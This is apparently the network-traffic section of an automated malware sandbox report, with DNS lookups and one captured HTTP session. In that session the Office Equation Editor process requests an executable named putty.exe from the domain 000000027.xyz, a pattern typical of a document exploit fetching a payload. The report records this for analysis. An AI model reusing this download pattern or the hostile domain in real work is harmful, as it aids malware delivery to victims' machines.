                                                                                                                                                                                                              May 12, 2021 15:21:41.304218054 CEST192.168.2.228.8.8.80xe7dcStandard query (0)ad.doubleclick.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:41.310303926 CEST192.168.2.228.8.8.80xf809Standard query (0)cdnssl.clicktale.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:41.613141060 CEST192.168.2.228.8.8.80x150Standard query (0)connect.facebook.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:42.939758062 CEST192.168.2.228.8.8.80xee8bStandard query (0)adservice.google.chA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.384886026 CEST192.168.2.228.8.8.80x97fbStandard query (0)c.clicktale.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.416783094 CEST192.168.2.228.8.8.80x893bStandard query (0)ing-district.clicktale.netA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.054750919 CEST192.168.2.228.8.8.80xed4eStandard query (0)cart.production.store-web.dynamics.comA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.138968945 CEST192.168.2.228.8.8.80xa1e7Standard query (0)assets.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.151081085 CEST192.168.2.228.8.8.80x9cddStandard query (0)mem.gfx.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.258678913 CEST192.168.2.228.8.8.80x43f9Standard query (0)statics-wcus.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.293044090 CEST192.168.2.228.8.8.80xc0b7Standard query (0)statics-eas.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.308598995 CEST192.168.2.228.8.8.80xf516Standard query (0)statics-neu.onestore.msA (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.486074924 CEST192.168.2.228.8.8.80x7a8eStandard query (0)statics-eus.onestore.msA (IP address)IN (0x0001)

                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                                                                              May 12, 2021 15:15:51.062102079 CEST8.8.8.8192.168.2.220xd372No error (0)000000027.xyz194.58.112.173A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:15:51.173315048 CEST8.8.8.8192.168.2.220xd372No error (0)000000027.xyz194.58.112.173A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:21.983865023 CEST8.8.8.8192.168.2.220x740eNo error (0)support.content.office.netsupport.content.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:22.150413036 CEST8.8.8.8192.168.2.220x7f7bNo error (0)js.monitor.azure.comaijscdn2.azureedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:22.159540892 CEST8.8.8.8192.168.2.220x746cNo error (0)cdnjs.cloudflare.com104.16.18.94A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:22.159540892 CEST8.8.8.8192.168.2.220x746cNo error (0)cdnjs.cloudflare.com104.16.19.94A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:22.571188927 CEST8.8.8.8192.168.2.220xacc7No error (0)consentdeliveryfd.azurefd.netfirstparty-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:23.004749060 CEST8.8.8.8192.168.2.220x5121No error (0)mem.gfx.mscdn.account.microsoft.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.426608086 CEST8.8.8.8192.168.2.220x20c5No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.426608086 CEST8.8.8.8192.168.2.220x20c5No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.504035950 CEST8.8.8.8192.168.2.220xbc5bNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.504035950 CEST8.8.8.8192.168.2.220xbc5bNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.539782047 CEST8.8.8.8192.168.2.220x184No error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.539782047 CEST8.8.8.8192.168.2.220x184No error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.591227055 CEST8.8.8.8192.168.2.220x7a3bNo error (0)cdn.digicertcdn.com104.18.10.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:26.591227055 CEST8.8.8.8192.168.2.220x7a3bNo error (0)cdn.digicertcdn.com104.18.11.39A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:28.589936018 CEST8.8.8.8192.168.2.220x34e0No error (0)login.microsoftonline.coma.privatelink.msidentity.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:28.589936018 CEST8.8.8.8192.168.2.220x34e0No error (0)a.privatelink.msidentity.comprda.aadg.msidentity.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:28.589936018 CEST8.8.8.8192.168.2.220x34e0No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:16:29.428152084 CEST8.8.8.8192.168.2.220xca54No error (0)prda.aadg.msidentity.comwww.tm.a.prd.aadg.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:01.491034985 CEST8.8.8.8192.168.2.220xcc2bNo error (0)ajax.aspnetcdn.commscomajax.vo.msecnd.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:01.531650066 CEST8.8.8.8192.168.2.220xb8d8No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.121445894 CEST8.8.8.8192.168.2.220x5f47No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.161962986 CEST8.8.8.8192.168.2.220x945bNo error (0)microsoftwindows.112.2o7.net35.181.18.61A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.161962986 CEST8.8.8.8192.168.2.220x945bNo error (0)microsoftwindows.112.2o7.net15.237.76.117A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.161962986 CEST8.8.8.8192.168.2.220x945bNo error (0)microsoftwindows.112.2o7.net15.237.136.106A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.164366007 CEST8.8.8.8192.168.2.220x9196No error (0)mem.gfx.mscdn.account.microsoft.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.789113045 CEST8.8.8.8192.168.2.220x82b9No error (0)publisher.liveperson.netpublisher.livepersonk.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.789113045 CEST8.8.8.8192.168.2.220x82b9No error (0)liveperson.map.fastly.net151.101.1.192A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.789113045 CEST8.8.8.8192.168.2.220x82b9No error (0)liveperson.map.fastly.net151.101.65.192A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.789113045 CEST8.8.8.8192.168.2.220x82b9No error (0)liveperson.map.fastly.net151.101.129.192A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:04.789113045 CEST8.8.8.8192.168.2.220x82b9No error (0)liveperson.map.fastly.net151.101.193.192A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:05.909655094 CEST8.8.8.8192.168.2.220x4fb8No error (0)logincdn.msauth.netlgincdn.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:05.909655094 CEST8.8.8.8192.168.2.220x4fb8No error (0)cs1227.wpc.alphacdn.net192.229.221.185A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:07.341213942 CEST8.8.8.8192.168.2.220x2370No error (0)sni1gl.wpc.gammacdn.net152.199.21.175A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.342760086 CEST8.8.8.8192.168.2.220xc1bbNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.354192972 CEST8.8.8.8192.168.2.220x361fNo error (0)mem.gfx.mscdn.account.microsoft.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.358577013 CEST8.8.8.8192.168.2.220x3855No error (0)microsoftwindows.112.2o7.net35.181.18.61A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.358577013 CEST8.8.8.8192.168.2.220x3855No error (0)microsoftwindows.112.2o7.net15.237.76.117A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:11.358577013 CEST8.8.8.8192.168.2.220x3855No error (0)microsoftwindows.112.2o7.net15.237.136.106A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:12.144756079 CEST8.8.8.8192.168.2.220x746No error (0)amp.azure.net160c1.wpc.azureedge.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:17.466455936 CEST8.8.8.8192.168.2.220xf103No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:18.254508018 CEST8.8.8.8192.168.2.220x6dfcNo error (0)offertooldataprod.blob.core.windows.netblob.bl6prdstr14a.store.core.windows.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:18.254508018 CEST8.8.8.8192.168.2.220x6dfcNo error (0)blob.bl6prdstr14a.store.core.windows.net52.239.152.74A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:30.328083992 CEST8.8.8.8192.168.2.220xb15fNo error (0)surfaceselfserviceoffertool.azurewebsites.netwaws-prod-mwh-031.sip.azurewebsites.windows.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:30.328083992 CEST8.8.8.8192.168.2.220xb15fNo error (0)waws-prod-mwh-031.sip.azurewebsites.windows.netwaws-prod-mwh-031.cloudapp.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.157116890 CEST8.8.8.8192.168.2.220x5628No error (0)mem.gfx.mscdn.account.microsoft.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.217571020 CEST8.8.8.8192.168.2.220x583cNo error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.248473883 CEST8.8.8.8192.168.2.220x6248No error (0)microsoftwindows.112.2o7.net35.181.18.61A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.248473883 CEST8.8.8.8192.168.2.220x6248No error (0)microsoftwindows.112.2o7.net15.237.76.117A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:31.248473883 CEST8.8.8.8192.168.2.220x6248No error (0)microsoftwindows.112.2o7.net15.237.136.106A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:35.455982924 CEST8.8.8.8192.168.2.220x7436No error (0)www.xbox.comwww.xbox.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.281470060 CEST8.8.8.8192.168.2.220x3030No error (0)assets.xbox.comassets.xbox.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.295298100 CEST8.8.8.8192.168.2.220xc184No error (0)compass-ssl.xbox.comcompass-ssl.xbox.com.nsatc.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.313637972 CEST8.8.8.8192.168.2.220x3373No error (0)account.xbox.comaccount.xbox.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.337560892 CEST8.8.8.8192.168.2.220x9d40No error (0)c.xbox.comc.xbox.com.nsatc.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.337560892 CEST8.8.8.8192.168.2.220x9d40No error (0)c.live.comc.msn.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:36.337560892 CEST8.8.8.8192.168.2.220x9d40No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net34.252.156.174A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net52.18.150.20A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net52.212.193.208A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net52.213.168.74A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net34.251.77.56A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net52.51.251.137A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net34.252.166.160A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:37.971148968 CEST8.8.8.8192.168.2.220xcaf0No error (0)microsoftmscompoc.tt.omtrdc.net52.212.164.82A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:39.289236069 CEST8.8.8.8192.168.2.220xca23No error (0)ad.atdmt.comgeo.atlassbx.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:39.289236069 CEST8.8.8.8192.168.2.220xca23No error (0)geo.atlassbx.comatlas.c10r.facebook.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:39.289236069 CEST8.8.8.8192.168.2.220xca23No error (0)atlas.c10r.facebook.com185.60.216.6A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:39.594022036 CEST8.8.8.8192.168.2.220x7400No error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:39.606323004 CEST8.8.8.8192.168.2.220xc684No error (0)controllers.xbox.comcontrollers.xbox.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)mscom.demdex.netgslb-2.demdex.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)gslb-2.demdex.netedge-irl1.demdex.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)edge-irl1.demdex.netdcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.210.171.182A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.31.176.223A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com54.195.203.160A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.51.173.153A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com54.194.220.26A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com52.212.101.97A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com34.254.147.143A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:40.153599024 CEST8.8.8.8192.168.2.220x95a7No error (0)dcs-edge-irl1-876252164.eu-west-1.elb.amazonaws.com18.200.157.96A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:41.370922089 CEST8.8.8.8192.168.2.220xf809No error (0)cdnssl.clicktale.netcdn-dsa.clicktale.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:41.374447107 CEST8.8.8.8192.168.2.220xe7dcNo error (0)ad.doubleclick.netdart.l.doubleclick.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:41.374447107 CEST8.8.8.8192.168.2.220xe7dcNo error (0)dart.l.doubleclick.net142.250.185.102A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:41.671910048 CEST8.8.8.8192.168.2.220x150No error (0)connect.facebook.netscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:41.671910048 CEST8.8.8.8192.168.2.220x150No error (0)scontent.xx.fbcdn.net185.60.216.19A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.004435062 CEST8.8.8.8192.168.2.220xee8bNo error (0)adservice.google.chpagead46.l.doubleclick.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.004435062 CEST8.8.8.8192.168.2.220xee8bNo error (0)pagead46.l.doubleclick.net172.217.168.66A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c.clicktale.netc-ct-eu.contentsquare.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net34.251.174.164A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net52.213.24.133A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net34.243.8.13A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net52.18.132.108A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net34.241.235.219A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net52.208.183.15A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net54.77.197.90A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.433542013 CEST8.8.8.8192.168.2.220x97fbNo error (0)c-ct-eu.contentsquare.net52.212.82.211A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)ing-district.clicktale.netwebrecorder-prod-1682395302.us-east-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com52.45.173.110A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com35.174.231.165A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com34.194.62.250A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com52.2.255.253A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com52.21.179.207A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com100.24.112.97A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com18.208.116.152A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:43.477205038 CEST8.8.8.8192.168.2.220x893bNo error (0)webrecorder-prod-1682395302.us-east-1.elb.amazonaws.com52.0.182.224A (IP address)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.141972065 CEST8.8.8.8192.168.2.220xed4eNo error (0)cart.production.store-web.dynamics.comstoreweb-cart-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.141972065 CEST8.8.8.8192.168.2.220xed4eNo error (0)cart.northeurope.production.store-web.dynamics.comsw-prod-appgwpublicip-northeurope.northeurope.cloudapp.azure.comCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.201509953 CEST8.8.8.8192.168.2.220xa1e7No error (0)assets.onestore.msassets.onestore.ms.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.210259914 CEST8.8.8.8192.168.2.220x9cddNo error (0)mem.gfx.mscdn.account.microsoft.com.akadns.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.324676037 CEST8.8.8.8192.168.2.220x43f9No error (0)statics-wcus.onestore.msstatics.onestore.ms.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.354356050 CEST8.8.8.8192.168.2.220xc0b7No error (0)statics-eas.onestore.msstatics.onestore.ms.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.367301941 CEST8.8.8.8192.168.2.220xf516No error (0)statics-neu.onestore.msstatics.onestore.ms.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                                                                                                                                                                              May 12, 2021 15:21:47.544673920 CEST8.8.8.8192.168.2.220x7a8eNo error (0)statics-eus.onestore.msstatics.onestore.ms.edgekey.netCNAME (Canonical name)IN (0x0001)

                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                              • 000000027.xyz

                                                                                                                                                                                                              HTTP Packets

                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                              0192.168.2.2249165194.58.112.17380C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                              May 12, 2021 15:15:51.272207022 CEST0OUTGET /putty.exe HTTP/1.1
                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                              Host: 000000027.xyz
                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                              May 12, 2021 15:15:51.361237049 CEST1INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Wed, 12 May 2021 13:15:51 GMT
                                                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                              Content-Length: 325
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Location: https://go.microsoft.com/fwlink/?LinkId=691209
                                                                                                                                                                                                              Expires: Wed, 12 May 2021 13:20:51 GMT
                                                                                                                                                                                                              Cache-Control: max-age=300
                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 20 3c 70 3e 54 68 69 73 20 69 74 65 6d 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69 6e 6b 49 64 3d 36 39 31 32 30 39 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Moved</title> </head> <body> <p>This item has moved <a href="https://go.microsoft.com/fwlink/?LinkId=691209">here</a>.</p> </body></html>


                                                                                                                                                                                                              HTTPS Packets

                                                                                                                                                                                                              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
